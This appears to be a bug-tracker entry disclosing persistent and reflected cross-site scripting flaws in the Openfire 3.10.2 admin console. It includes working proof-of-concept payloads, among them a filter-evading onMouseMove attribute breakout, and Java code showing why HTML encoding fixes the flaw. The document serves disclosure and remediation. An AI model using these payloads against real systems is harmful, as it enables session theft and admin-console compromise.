Details

      Description

      hyp3rlinx has reported several Persistent & Reflected XSS issues in the Openfire v3.10.2 admin console. A couple of these require the Client Control plugin to be installed.

      Full details at: https://packetstormsecurity.com/files/133558/Openfire-3.10.2-Cross-Site-Scripting.html

      Vulnerability Details:

      1) Persistent XSS exists when creating a Group Chat Bookmark; the XSS will execute each time the victim accesses the 'Group Chat Bookmarks' web page. The vulnerable parameter is 'groupchatName'. The XSS will be stored in the 'ofbookmark' table, in the 'bookmarkName' column of the MySQL DB, and will be under bookmarkType as 'group_chat'.

      2) Persistent XSS exists when creating URL Bookmarks. The vulnerable parameter is 'urlName'. The XSS will be stored in the 'ofbookmark' table, in the 'bookmarkName' column of the MySQL DB, and will be under column bookmarkType as 'url'.

      3) A reflected XSS entry point exists in the search parameter; script tags fail, but this can be defeated using the onMouseMove() JS function.

      Exploit Code(s):

      1) Persistent XSS:
      http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=group_chat
      Inject the following payload into the 'Group Chat Name' field, then click 'Create'.

      <script>alert(666)</script>

      2) Persistent XSS:
      http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=url
      Inject the following payload into the 'URL Name' field, then click 'Create'.

      <script>alert('HELL')</script>

      3) Reflected XSS:

      http://localhost:9090/server-session-details.jsp?hostname="/><script>alert(666)</script>

      4) Reflected XSS:

      http://localhost:9090/group-summary.jsp?search="onMouseMove="alert('hyp3rlinx')
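
      The following is an added example, not Openfire code and not part of the original report. It shows why a filter that only removes script tags leaves the 'search' and 'hostname' cases open, and how encoding the value for a quoted HTML attribute closes them. The class name, the method names and the input template are assumptions; the report does not show the JSP markup.

```java
// Added example: hypothetical names, not taken from the Openfire code base.
public class AttrEncodingDemo {

    // Weak control (assumed stand-in): removes <script> tags and nothing else.
    static String stripScriptTags(String s) {
        return s.replaceAll("(?i)</?script[^>]*>", "");
    }

    // Contextual encoder for HTML text and quoted attribute values.
    static String encodeForHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Assumed template: the request parameter echoed into a quoted attribute.
    static String render(String value) {
        return "<input type=\"text\" name=\"search\" value=\"" + value + "\">";
    }

    // The template itself contains exactly 6 double quotes; any more means
    // the value closed the attribute and markup after it is attacker-controlled.
    static boolean breaksOutOfAttribute(String html) {
        return html.chars().filter(ch -> ch == '"').count() != 6;
    }

    public static void main(String[] args) {
        // Parameter values as they appear in items 3 and 4 of the report.
        String[] inputs = {
            "\"/><script>alert(666)</script>",
            "\"onMouseMove=\"alert('hyp3rlinx')"
        };
        for (String in : inputs) {
            String filtered = render(stripScriptTags(in));
            String encoded  = render(encodeForHtml(in));
            System.out.println("tag filter : " + filtered + "  breakout=" + breaksOutOfAttribute(filtered));
            System.out.println("encoded    : " + encoded + "  breakout=" + breaksOutOfAttribute(encoded));
        }
    }
}
```

      With the tag filter alone both inputs still report breakout=true, and the second keeps its event-handler attribute intact; with encoding the value stays inside the attribute in both cases. The same encoding applies when the stored 'bookmarkName' values are written back into the bookmark pages.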

            People

            Assignee:
            dwd Dave Cridland
            Reporter:
            timd Tim Durden